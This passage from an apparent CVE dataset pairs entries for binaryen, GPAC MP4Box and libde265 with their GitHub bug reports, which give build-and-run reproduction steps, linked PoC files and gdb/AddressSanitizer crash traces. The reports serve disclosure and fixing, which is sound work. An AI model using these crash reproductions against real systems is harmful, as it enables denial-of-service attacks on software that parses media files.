--> 0x612000000225 ("on> wasm::Builder::makeFunction(wasm::Name, wasm::HeapType, std::vector<Type> &&, wasm::Expression *): Assertion `type.isSignature()' failed.\n") 0040| 0x7fffffffb8b8 --> 0x6120000001c0 --> 0x7369642d69000001 0048| 0x7fffffffb8c0 --> 0x6120000001c0 --> 0x7369642d69000001 0056| 0x7fffffffb8c8 --> 0x6120000002b3 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff443f859 in __GI_abort () at abort.c:79 #2 0x00007ffff443f729 in __assert_fail_base (fmt=0x7ffff45d5588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff799dc00 <str> "type.isSignature()", file=0x7ffff799dc40 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h", line=0x31, function=<optimized out>) at assert.c:92 #3 0x00007ffff4450f36 in __GI___assert_fail (assertion=0x7ffff799dc00 <str> "type.isSignature()", file=0x7ffff799dc40 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h", line=0x31, function=0x7ffff799dca0 <__PRETTY_FUNCTION__._ZN4wasm7Builder12makeFunctionENS_4NameENS_8HeapTypeEOSt6vectorINS_4TypeESaIS4_EEPNS_10ExpressionE> "static std::unique_ptr<Function> wasm::Builder::makeFunction(wasm::Name, wasm::HeapType, std::vector<Type> &&, wasm::Expression *)") at assert.c:101 #4 0x00007ffff51417c4 in wasm::Builder::makeFunction (name=..., type=..., vars=..., body=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h:49 #5 0x00007ffff6ea172f in wasm::WasmBinaryBuilder::readImports (this=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:2059 #6 0x00007ffff6e9967e in wasm::WasmBinaryBuilder::read (this=0x7fffffffcce0) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:1417 #7 0x00007ffff7046785 in wasm::ModuleReader::readBinaryData (this=<optimized out>, input=..., wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:63 #8 0x00007ffff7046f76 in wasm::ModuleReader::readBinary (this=<optimized out>, filename=<incomplete type>, wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:74 #9 0x00000000004cf7ca in main (argc=<optimized out>, argv=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/tools/wasm-dis.cpp:65 #10 0x00007ffff44410b3 in __libc_start_main (main=0x4cdef0 <main(int, char const**)>, argc=0x2, argv=0x7fffffffe348, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe338) at ../csu/libc-start.c:308 #11 0x000000000042375e in _start () at /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/iostream:74 ```

A abort failure in wasm::Builder::makeFunction

https://api.github.com/repos/WebAssembly/binaryen/issues/4413/comments

2021-12-25T08:10:49Z

2022-01-05T01:17:37Z

https://github.com/WebAssembly/binaryen/issues/4413

CVE-2020-25427

2022-01-10T22:15:08.067

A Null pointer dereference vulnerability exits in MP4Box - GPAC version 0.8.0-rev177-g51a8ef874-master via the gf_isom_get_track_id function, which causes a denial of service.

https://github.com/gpac/gpac/issues/1406

github.com

Command-: MP4Box -crypt test.xml $POC -out test.mp4 Version-: MP4Box - GPAC version 0.8.0-rev177-g51a8ef874-master Reproducer file-: [Reproducer](https://github.com/mannuJoshi/POCs/blob/master/POC) GDB-: ``` IsoMedia import id:000034,sig:11,src:000003,op:flip4,pos:8995 - track ID 1 - media type "sdsm:mp4s" [BS] Attempt to write 128 bits, when max is 32 Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── $rax : 0x0 $rbx : 0x0 $rcx : 0x0 $rdx : 0x1 $rsp : 0x00007fffffff8fc0 → 0x0000000100000000 $rbp : 0x2153 $rsi : 0x1 $rdi : 0x00005555555bff20 → 0x0000000000000000 $rip : 0x00007ffff7b0e625 → <gf_media_update_bitrate+389> mov DWORD PTR [rax+0x14], ecx $r8 : 0x2 $r9 : 0x1 $r10 : 0x0 $r11 : 0x00005555555c37c0 → 0x0000000000000001 $r12 : 0x2153 $r13 : 0x00005555555bff20 → 0x0000000000000000 $r14 : 0x1 $r15 : 0x00005555555c4460 → 0x0000000000010003 $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffff8fc0│+0x0000: 0x0000000100000000 ← $rsp 0x00007fffffff8fc8│+0x0008: 0x0000000000000000 0x00007fffffff8fd0│+0x0010: 0x0000000000002153 ("S!"?) 0x00007fffffff8fd8│+0x0018: 0x00000000000003e8 0x00007fffffff8fe0│+0x0020: 0x00007fffffff9000 → 0x0000000000000000 0x00007fffffff8fe8│+0x0028: 0x00005555555c4460 → 0x0000000000010003 0x00007fffffff8ff0│+0x0030: 0x0000000000000000 0x00007fffffff8ff8│+0x0038: 0x0000000000000000 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x7ffff7b0e618 <gf_media_update_bitrate+376> sbb BYTE PTR [r9+r9*4-0x11], r9b 0x7ffff7b0e61d <gf_media_update_bitrate+381> mov edx, 0x1 0x7ffff7b0e622 <gf_media_update_bitrate+386> mov esi, r14d → 0x7ffff7b0e625 <gf_media_update_bitrate+389> mov DWORD PTR [rax+0x14], ecx 0x7ffff7b0e628 <gf_media_update_bitrate+392> mov rax, QWORD PTR [r15+0x18] 0x7ffff7b0e62c <gf_media_update_bitrate+396> mov rcx, r15 0x7ffff7b0e62f <gf_media_update_bitrate+399> mov DWORD PTR [rax+0x10], ebx 0x7ffff7b0e632 <gf_media_update_bitrate+402> mov rax, QWORD PTR [r15+0x18] 0x7ffff7b0e636 <gf_media_update_bitrate+406> mov DWORD PTR [rax+0xc], ebp ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "MP4Box", stopped, reason: SIGSEGV ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x7ffff7b0e625 → gf_media_update_bitrate() [#1] 0x7ffff7b13cd6 → gf_import_isomedia() [#2] 0x7ffff7b211d5 → gf_media_import() [#3] 0x55555556df0a → mp4boxMain() [#4] 0x7ffff74b5b97 → __libc_start_main(main=0x5555555631e0 <main>, argc=0x6, argv=0x7fffffffdfe8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdfd8) [#5] 0x55555556321a → _start() ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 0x00007ffff7b0e625 in gf_media_update_bitrate () from /usr/local/lib/libgpac.so.8 gef➤ bt #0 0x00007ffff79d18fd in gf_isom_get_track_id () from /usr/local/lib/libgpac.so.8 #1 0x00007ffff7b45ef1 in gf_crypt_file () from /usr/local/lib/libgpac.so.8 #2 0x0000555555577575 in mp4boxMain (argc=0x6, argv=0x7fffffffdfb8) at main.c:5474 #3 0x00005555555796a3 in main (argc=0x6, argv=0x7fffffffdfb8) at main.c:5985 gef➤ i r rax 0x0 0x0 rbx 0x0 0x0 rcx 0x20 0x20 rdx 0x0 0x0 rsi 0x0 0x0 rdi 0x5555555d0650 0x5555555d0650 rbp 0x7ffffffbd660 0x7ffffffbd660 rsp 0x7ffffffbd640 0x7ffffffbd640 r8 0x0 0x0 r9 0x0 0x0 r10 0x19 0x19 r11 0x7ffff79d18b5 0x7ffff79d18b5 r12 0x555555562470 0x555555562470 r13 0x7fffffffdfb0 0x7fffffffdfb0 r14 0x0 0x0 r15 0x0 0x0 rip 0x7ffff79d18fd 0x7ffff79d18fd <gf_isom_get_track_id+72> eflags 0x10202 [ IF RF ] cs 0x33 0x33 ss 0x2b 0x2b ds 0x0 0x0 es 0x0 0x0 fs 0x0 0x0 gs 0x0 0x0 gef➤ exploitable Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: a5cc92255fba44e928c1a0bb49438db1.a5cc92255fba44e928c1a0bb49438db1 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) ```

Null pointer dereference in function gf_isom_get_track_id()

https://api.github.com/repos/gpac/gpac/issues/1406/comments

2020-02-08T13:37:09Z

2020-06-11T17:32:43Z

https://github.com/gpac/gpac/issues/1406

CVE-2021-35452

2022-01-10T22:15:08.197

An Incorrect Access Control vulnerability exists in libde265 v1.0.8 due to a SEGV in slice.cc.

https://github.com/strukturag/libde265/issues/298

github.com

Hello, A SEGV has occurred when running program dec265， System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc (1).zip](https://github.com/strukturag/libde265/files/6695106/poc.1.zip) Verification steps： 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265(without asan) ``` ./dec265 poc ``` Output ``` WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: slice header invalid Segmentation fault(core dumped) ``` AddressSanitizer output ``` ================================================================= ==1960598==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x7f65de25eac3 bp 0x61b000001c80 sp 0x7ffe41764b90 T0) ==1960598==The signal is caused by a READ memory access. #0 0x7f65de25eac2 in slice_segment_header::read(bitreader*, decoder_context*, bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:390 #1 0x7f65de14837a in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:626 #2 0x7f65de14a839 in decoder_context::decode_NAL(NAL_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1230 #3 0x7f65de14be1e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1318 #4 0x55d4ecf488fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764 #5 0x7f65ddc9a0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #6 0x55d4ecf4b76d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:390 in slice_segment_header::read(bitreader*, decoder_context*, bool*) ==1960598==ABORTING ``` gdb info ``` [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: slice header invalid Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0xffffffffffffff90 RCX: 0x617000000090 --> 0x100000000 --> 0x0 RDX: 0xc2e00000013 --> 0x0 RSI: 0x20000000 ('') RDI: 0x617000000098 --> 0x100000001 --> 0x0 RBP: 0x61b000001c80 --> 0xbebebebe00000000 RSP: 0x7fffffff3570 --> 0x0 RIP: 0x7ffff73abac3 (<slice_segment_header::read(bitreader*, decoder_context*, bool*)+2387>: movzx r14d,BYTE PTR [rsi+0x7fff8000]) R8 : 0xfffff8f8 --> 0x0 R9 : 0x7 R10: 0x9 ('\t') R11: 0xfffffffe6c8 --> 0x0 R12: 0x7ffff31ff800 --> 0xbebebebebebebebe R13: 0x7fffffff3a40 --> 0x62e000078405 --> 0xbebebebebebebebe R14: 0xffffe641bdb --> 0x0 R15: 0x555555569bd0 --> 0x7ffff31ff800 --> 0xbebebebebebebebe EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff73abab6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2374>: mov rsi,QWORD PTR [rcx+0x8] 0x7ffff73ababa <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2378>: mov QWORD PTR [rsp+0x10],rsi 0x7ffff73ababf <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2383>: shr rsi,0x3 => 0x7ffff73abac3 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2387>: movzx r14d,BYTE PTR [rsi+0x7fff8000] 0x7ffff73abacb <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2395>: test r14b,r14b 0x7ffff73abace <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2398>: je 0x7ffff73abad6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2406>: je 0x7ffff73abad6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2406> 0x7ffff73abad0 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2400>: jle 0x7ffff73b31dc <slice_segment_header::read(bitreader*, decoder_context*, bool*)+32876>: jle 0x7ffff73b31dc <slice_segment_header::read(bitreader*, decoder_context*, bool*)+32876> 0x7ffff73abad6 <slice_segment_header::read(bitreader*, decoder_context*, bool*)+2406>: mov rax,QWORD PTR [rsp+0x10] [------------------------------------stack-------------------------------------] 0000| 0x7fffffff3570 --> 0x0 0008| 0x7fffffff3578 --> 0x621000000100 --> 0x7ffff7565f30 --> 0x7ffff72719e0 (<decoder_context::~decoder_context()>: endbr64) 0016| 0x7fffffff3580 --> 0x100000001 --> 0x0 0024| 0x7fffffff3588 --> 0x61b000001c88 --> 0x617000000090 --> 0x100000000 --> 0x0 0032| 0x7fffffff3590 --> 0x7fffffff3780 --> 0x0 0040| 0x7fffffff3598 --> 0x7fffffff3620 --> 0x41b58ab3 0048| 0x7fffffff35a0 --> 0x61b000001ca0 --> 0xbebebe00 --> 0x0 0056| 0x7fffffff35a8 --> 0xfffffffe6c4 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff73abac3 in slice_segment_header::read ( this=this@entry=0x61b000001c80, br=br@entry=0x7fffffff3a40, ctx=ctx@entry=0x621000000100, continueDecoding=continueDecoding@entry=0x7fffffff3780) at /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:390 390 if (!sps->sps_read) { ``` **This issue will cause Denial of Service attacks**

SEGV in slice.cc

https://api.github.com/repos/strukturag/libde265/issues/298/comments

2021-06-22T14:49:43Z

2022-12-12T14:41:13Z

https://github.com/strukturag/libde265/issues/298

CVE-2021-36408

2022-01-10T23:15:08.963

An issue was discovered in libde265 v1.0.8.There is a Heap-use-after-free in intrapred.h when decoding file using dec265.

https://github.com/strukturag/libde265/issues/299

github.com

Hello, A Heap-use-after-free has occurred when running program dec265 System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc.zip](https://github.com/strukturag/libde265/files/6698738/poc.zip) Verification steps： 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265 ``` ./dec265 poc ``` asan info ``` ================================================================= ==1538158==ERROR: AddressSanitizer: heap-use-after-free on address 0x625000007e04 at pc 0x7efe5f2b9526 bp 0x7ffceaaa13c0 sp 0x7ffceaaa13b0 READ of size 4 at 0x625000007e04 thread T0 #0 0x7efe5f2b9525 in intra_border_computer<unsigned char>::fill_from_image() /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552 #1 0x7efe5f2ba6e9 in void fill_border_samples<unsigned char>(de265_image*, int, int, int, int, unsigned char*) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:260 #2 0x7efe5f2ba6e9 in void decode_intra_prediction_internal<unsigned char>(de265_image*, int, int, IntraPredMode, unsigned char*, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:284 #3 0x7efe5f2a5383 in decode_intra_prediction(de265_image*, int, int, IntraPredMode, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:335 #4 0x7efe5f31dc52 in decode_TU /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3453 #5 0x7efe5f342e76 in read_transform_unit(thread_context*, int, int, int, int, int, int, int, int, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3665 #6 0x7efe5f347191 in read_transform_tree(thread_context*, int, int, int, int, int, int, int, int, int, int, int, PredMode, unsigned char, unsigned char) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3942 #7 0x7efe5f34e119 in read_coding_unit(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4575 #8 0x7efe5f3548f2 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4652 #9 0x7efe5f354357 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4635 #10 0x7efe5f356564 in decode_substream(thread_context*, bool, bool) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4741 #11 0x7efe5f358ddb in read_slice_segment_data(thread_context*) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:5054 #12 0x7efe5f23dd75 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:843 #13 0x7efe5f240c0f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:945 #14 0x7efe5f241715 in decoder_context::decode_some(bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:730 #15 0x7efe5f24695e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1329 #16 0x55990c1348fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764 #17 0x7efe5ed950b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #18 0x55990c13776d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d) 0x625000007e04 is located 1284 bytes inside of 8600-byte region [0x625000007900,0x625000009a98) freed by thread T0 here: #0 0x7efe5f6408df in operator delete(void*) (/lib/x86_64-linux-gnu/libasan.so.5+0x1108df) #1 0x7efe5f24b576 in std::_Sp_counted_ptr_inplace<pic_parameter_set, std::allocator<pic_parameter_set>, (__gnu_cxx::_Lock_policy)2>::_M_destroy() /usr/include/c++/9/ext/new_allocator.h:128 #2 0x7efe5f4d996f (/home/dh/sda3/libde265-master/libde265-master/build/libde265/liblibde265.so+0x37d96f) previously allocated by thread T0 here: #0 0x7efe5f63f947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) #1 0x7efe5f22cf3f in std::shared_ptr<pic_parameter_set> std::make_shared<pic_parameter_set>() /usr/include/c++/9/ext/new_allocator.h:114 #2 0x7efe5f22cf3f in decoder_context::read_pps_NAL(bitreader&) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:572 #3 0x7efe5b1ff7ff (<unknown module>) #4 0x614fffffffff (<unknown module>) SUMMARY: AddressSanitizer: heap-use-after-free /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552 in intra_border_computer<unsigned char>::fill_from_image() Shadow bytes around the buggy address: 0x0c4a7fff8f70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8f80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8f90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c4a7fff8fc0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8fe0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff8ff0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff9000: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a7fff9010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1538158==ABORTING ```

Heap-use-after-free in intrapred.h when decoding file

https://api.github.com/repos/strukturag/libde265/issues/299/comments

2021-06-23T03:45:54Z

2022-10-01T10:45:53Z

https://github.com/strukturag/libde265/issues/299

CVE-2021-36409

2022-01-10T23:15:09.047

There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file, which allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file or possibly have unspecified other impact.

https://github.com/strukturag/libde265/issues/300

github.com

Hello, There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file. System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc (3).zip](https://github.com/strukturag/libde265/files/6709588/poc.3.zip) Verification steps： 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 16 ``` 3.run dec265 ``` ./dec265 poc ``` Output ``` WARNING: non-existing PPS referenced dec265: /home/dh/sda3/libde265-master/libde265-master/libde265/sps.cc:925: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed. Aborted(core dumped) ``` gdb info ``` [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". WARNING: non-existing PPS referenced dec265-afl++: /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/sps.cc:925: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed. Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff6c3a680 (0x00007ffff6c3a680) RCX: 0x7ffff6e0618b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff1ab0 --> 0x0 RDI: 0x2 RBP: 0x7ffff6f7b588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffff1ab0 --> 0x0 RIP: 0x7ffff6e0618b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff1ab0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff7538760 ("/home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/sps.cc") R13: 0x39d R14: 0x7ffff75388a0 ("scaling_list_pred_matrix_id_delta==1") R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6e0617f <__GI_raise+191>: mov edi,0x2 0x7ffff6e06184 <__GI_raise+196>: mov eax,0xe 0x7ffff6e06189 <__GI_raise+201>: syscall => 0x7ffff6e0618b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff6e06193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff6e0619c <__GI_raise+220>: jne 0x7ffff6e061c4 <__GI_raise+260> 0x7ffff6e0619e <__GI_raise+222>: mov eax,r8d 0x7ffff6e061a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff1ab0 --> 0x0 0008| 0x7fffffff1ab8 --> 0x7ffff768f6f0 (<free>: endbr64) 0016| 0x7fffffff1ac0 --> 0xe4e4e4e3fbad8000 0024| 0x7fffffff1ac8 --> 0x612000000040 --> 0x612d353606800001 0032| 0x7fffffff1ad0 --> 0x6120000000a5 ("265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed.\n") 0040| 0x7fffffff1ad8 --> 0x612000000040 --> 0x612d353606800001 0048| 0x7fffffff1ae0 --> 0x612000000040 --> 0x612d353606800001 0056| 0x7fffffff1ae8 --> 0x61200000013b --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. ``` source code of sps.cc:925 ``` 912 if (scaling_list_pred_matrix_id_delta==0) { 913 if (sizeId==0) { 914 memcpy(curr_scaling_list, default_ScalingList_4x4, 16); 915 } 916 else { 917 if (canonicalMatrixId<3) 918 { memcpy(curr_scaling_list, default_ScalingList_8x8_intra,64); } 919 else 920 { memcpy(curr_scaling_list, default_ScalingList_8x8_inter,64); } 921 } 922 } 923 else { 924 // TODO: CHECK: for sizeID=3 and the second matrix, should we have delta=1 or delta=3 ? 925 if (sizeId==3) { assert(scaling_list_pred_matrix_id_delta==1); } 926 927 int mID = matrixId - scaling_list_pred_matrix_id_delta; 928 929 int len = (sizeId == 0 ? 16 : 64); 930 memcpy(curr_scaling_list, scaling_list[mID], len); 931 932 scaling_list_dc_coef = dc_coeff[sizeId][mID]; 933 dc_coeff[sizeId][matrixId] = dc_coeff[sizeId][mID]; 934 } 935 } ```

There is an Assertion failed at sps.cc

https://api.github.com/repos/strukturag/libde265/issues/300/comments

2021-06-24T13:41:11Z

2023-01-27T12:19:27Z

https://github.com/strukturag/libde265/issues/300

CVE-2021-36410

2022-01-10T23:15:09.093

A stack-buffer-overflow exists in libde265 v1.0.8 via fallback-motion.cc in function put_epel_hv_fallback when running program dec265.

https://github.com/strukturag/libde265/issues/301

github.com

Hello, A stack-buffer-overflow has occurred when running program dec265 System info： Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Dec265 v1.0.8 [poc (4).zip](https://github.com/strukturag/libde265/files/6710061/poc.4.zip) Verification steps： 1.Get the source code of libde265 2.Compile ``` cd libde265 mkdir build && cd build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 32 ``` 3.run dec265 ``` ./dec265 poc ``` asan info ``` ================================================================= ==1262407==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeacbd65e3 at pc 0x7ff9ff7de308 bp 0x7ffeacbd3f00 sp 0x7ffeacbd3ef0 READ of size 2 at 0x7ffeacbd65e3 thread T0 #0 0x7ff9ff7de307 in void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/fallback-motion.cc:352 #1 0x7ff9ff830067 in acceleration_functions::put_hevc_epel_hv(short*, long, void const*, long, int, int, int, int, short*, int) const /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/acceleration.h:328 #2 0x7ff9ff830067 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:254 #3 0x7ff9ff8262ab in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:388 #4 0x7ff9ff828626 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:2107 #5 0x7ff9ff89c8aa in read_coding_unit(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4314 #6 0x7ff9ff8a48f2 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4652 #7 0x7ff9ff8a4e43 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4638 #8 